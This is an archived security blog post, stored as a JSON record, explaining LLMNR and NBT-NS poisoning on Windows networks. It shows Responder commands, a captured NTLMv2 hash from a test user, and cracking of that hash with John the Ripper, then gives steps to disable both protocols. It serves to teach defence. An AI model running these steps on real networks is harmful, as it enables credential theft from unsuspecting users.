{
	"id": "73a59442-feea-4bd0-8ad1-fa817dedf085",
	"created_at": "2026-04-06T00:12:33.688354Z",
	"updated_at": "2026-04-10T03:20:36.89226Z",
	"deleted_at": null,
	"sha1_hash": "49a67d34f60465f9424b32d4360ab37fd32afa86",
	"title": "Local Network Attacks: LLMNR and NBT-NS Poisoning",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 508456,
	"plain_text": "Local Network Attacks: LLMNR and NBT-NS Poisoning\r\nBy Jon Sternstein\r\nPublished: 2013-11-16 · Archived: 2026-04-05 21:24:03 UTC\r\nBackground\r\nHow can an attacker capture usernames and passwords on a local network by simply waiting for the computers to\r\nwillingly give them up?  LLMNR and NBT-NS poisoning!\r\nLink-Local Multicast Name Resolution (LLMNR) and Netbios Name Service (NBT-NS) are two components of\r\nMicrosoft Windows machines.  LLLMNR was introduced in Windows Vista and is the successor to NBT-NS.\r\nThey are both seemingly innocuous components which allow machines on the same subnet help each other\r\nidentify hosts when DNS fails.  So if one machine tries to resolve a particular host, but DNS resolution fails, the\r\nmachine will then attempt to ask all other machines on the local network for the correct address via LLMNR or\r\nNBT-NS.\r\nThis seems harmless in theory, but it opens up a major vulnerability that attackers can use to gain full credentials\r\nto a system.\r\nVulnerability\r\nAn attacker can listen on a network for these LLMNR (UDP/5355) or NBT-NS (UDP/137) broadcasts and\r\nrespond to them, thus pretending that the attacker knows the location of the requested host.  \r\nLet’s look at an example in the diagram below.  \r\n1. The victim machine wants to go the print server at \\\\printserver, but mistakenly types in \\\\pintserver.  \r\n2. The DNS server responds to the victim saying that it doesn’t know that host.\r\n3. The victim then asks if there is anyone on the local network that knows the location of \\\\pintserver\r\n4. The attacker responds to the victim saying that it is the \\\\pintserver\r\n5. The victim believes the attacker and sends its own username and NTLMv2 hash to the attacker.\r\n6. The attacker can now crack the hash to discover the password\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 1 of 7\n\nAttack Tools\r\nThere are several tools that will allow you to act out the attack scenario detailed above.  One of the originals is\r\nNBNSpoof by Wesley McGrew (http://www.mcgrewsecurity.com/tools/nbnspoof/).  McGrew explains his website\r\nhow to create a tool to carry out such attack.  Metasploit has a LLMNR Spoofer module\r\nauxiliary/spoof/llmnr/llmnr_response (http://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response).\r\n The tool we will use today is “Responder” from SpiderLabs (https://github.com/SpiderLabs/Responder.git). \r\n1. Download the Responder software: git clone https://github.com/SpiderLabs/Responder.git\r\n2. Run the Responder help menu: python Responder.py -h\r\nNotice a couple mandatory options:\r\n-i [IP] : the attacker’s IP address (or the IP address to send the traffic to)\r\n-b [0/1]: Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.\r\nIn addition to those options, there are many switches which allow you to turn on or off various services to poison\r\n– http, https, smb, sql, ftp, ldap, dns, etc…  \r\nLet’s follow the example in the image above.  \r\n1.  To set things up, the attacker at 192.168.1.77 starts responder with “python Responder.py -I eth0 -wfv”.  \r\n#python Responder.py -I eth0 7 -wfv\r\nNBT Name Service/LLMNR Answerer 1.0.\r\nTo kill this script hit CRTL-C\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 2 of 7\n\n[+]NBT-NS \u0026 LLMNR responder started\r\nGlobal Parameters set\r\nChallenge set is: 1122334455667788\r\nWPAD Proxy Server is:On\r\nHTTP Server is:ON\r\nSMB Server is:ON\r\nSQL Server is:ON\r\nFTP Server is:ON\r\nDNS Server is:ON\r\nLDAP Server is:ON\r\nFingerPrint Module is:OFF\r\n2. The victim at 192.168.1.74 tries to go to \\\\pintserver which doesn’t exist.\r\n3.  The victim asks anyone on the local network for help identifying the \\\\pintserver\r\n4.  The attacker responds\r\n5.  The victim sends their credentials to the attacker.\r\nLLMNR poisoned answer sent to this IP: 192.168.1.74. The requested name was : pintserver.\r\n[+]SMB-NTLMv2 hash captured from : 192.168.1.74\r\nDomain is : WORKGROUP\r\nUser is : testuser\r\n[+]SMB complete hash is : testuser::WORKGROUP:\r\n1122334455667788:834735BBB9FBC3B168F1A721C5888E39:01010000000000004F51B4E9FADFCE01A7ABBB61969951540000000002000A0073006D0062\r\n6. The Responder program stores the credentials in a file in the local directory called SMB-NTLMv2-Client-192.168.1.74.txt\r\n7. The Attacker runs john the ripper against the file with the “john SMB-NTLMv2-Client-192.168.1.74.txt”\r\ncommand and John the Ripper immediately discovers the password of “password1”\r\n#john SMB-NTLMv2-Client-192.168.1.74.txt\r\nLoaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64])\r\npassword1 (testuser)\r\nguesses: 1 time: 0:00:00:00 DONE (Tue Nov 12 15:56:46 2013) c/s: 114620 trying: 123456 - crawford\r\nUse the \"--show\" option to display all of the cracked passwords reliably\r\nPacket Capture\r\nLet’s look at what’s happening at the network level.\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 3 of 7\n\n1. You can see the victim at 192.168.1.74 making a name query to the DNS server for “pintserver”.\r\n2. The DNS doesn’t know the host.\r\n3. The victim then makes a LLMNR broadcast for “pintserver”.\r\n4. The attacker at 192.168.1.77 responds.\r\n5. The victim creates an SMB connection to the attacker and sends its username and password hash.\r\nProtective Measures\r\nFixing the issue is easy:  \r\nDisable LLMNR and NBT-NS.  You need to disable both because if LLMNR is disabled, it will\r\nautomatically attempt to use NBT-NS instead.  See the instructions below.\r\nPrevent inter-VLAN communication – By limiting communication between hosts on the same network,\r\nyou greatly reduce the success of most local network attacks.\r\nUse limited user accounts – Now this won’t prevent an attack, but it will limit the damage that a successful\r\nattack can do and at least make an attacker work harder.  For example, if the victim is using “domain\r\nadmin” credentials, then a successful attack would give up the access to all machines on the network.  On\r\nthe other hand, if the victim is using a limited account, then the attacker will need to work harder to get\r\nfurther access in the environment.\r\nTo disable LLMNR on windows:\r\n1. Click Start\r\n2. Type gpedit.msc in the text box \r\n3. Navigate to Local Computer Policy -\u003e Computer Configuration -\u003e Administrative Templates -\u003e Network -\r\n\u003e DNS Client\r\n4. In the DNS Client Folder, double click on “Turn Off Multicast Name Resolution” and set it to\r\n“Enabled”\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 4 of 7\n\nThe following registry key is set on computers when LLMNR is disabled:\r\nHKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient\r\n“EnableMulticast” DWORD 0\r\nTo disable NetBIOS Name Service on a single machine:\r\n1. Open Control Panel\r\n2. Under “Network and Internet”, click “View network status and tasks”\r\n3. Click “Change adapter settings”\r\n4. Right-click “Local area connection” and then click “Properties”\r\n5. Double-click on “Internet Protocol Version 4 (TCP/IPv4)”, click “Advanced” then click on the “WINS”\r\n(Windows Internet Name Service) tab\r\n6. Click on “Disable NetBIOS over TCP/IP”\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 5 of 7\n\nTo disable NetBIOS Name Service across a domain with DHCP clients:\r\n1. Go to the DHCP Snap-In\r\n2. Go to “scope options” for the network you are changing\r\n3. Right click and Configure Options\r\n4. Select Advanced tab and change “Vendor class” to “Microsoft Windows 2000 Options”.\r\n5. In the “Available Options” frame, select and check the box “001 Microsoft Disable Netbios Option”\r\n6. In the “Data Entry” frame, change the data entry to 0x2\r\n7. Click “OK”.  The new settings will take affect when the clients renew their addresses.\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 6 of 7\n\nDisabling NetBios through DHCP configuration (Fine, 2011)\r\nReferences\r\n1. McGrew, Wesley. (2007, March 22). NetBIOS Name Service\r\nSpoofing. http://www.mcgrewsecurity.com/2007/03/22/netbios-name-service-spoofing/\r\n2. Gaffie, Laurent. (2012, October 24). Introducing Responder-1.0. http://blog.spiderlabs.com/2012/10/introducing-responder-10.html\r\n3. Fine, P. (2011, January 13). So long NetBIOS, it’s been fun! Retrieved from Exit | the | Fast | Lane:\r\nhttp://www.exitthefastlane.com/2011/01/so-long-netbios-its-been-fun.html\r\n4. MITRE. (2021, September 28). Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay.\r\nRetrieved from MITRE ATT\u0026CK: https://attack.mitre.org/techniques/T1557/001/\r\nSource: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nhttps://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning"
	],
	"report_names": [
		"local-network-attacks-llmnr-and-nbt-ns-poisoning"
	],
	"threat_actors": [],
	"ts_created_at": 1775434353,
	"ts_updated_at": 1775791236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/49a67d34f60465f9424b32d4360ab37fd32afa86.pdf",
		"text": "https://archive.orkl.eu/49a67d34f60465f9424b32d4360ab37fd32afa86.txt",
		"img": "https://archive.orkl.eu/49a67d34f60465f9424b32d4360ab37fd32afa86.jpg"
	}
}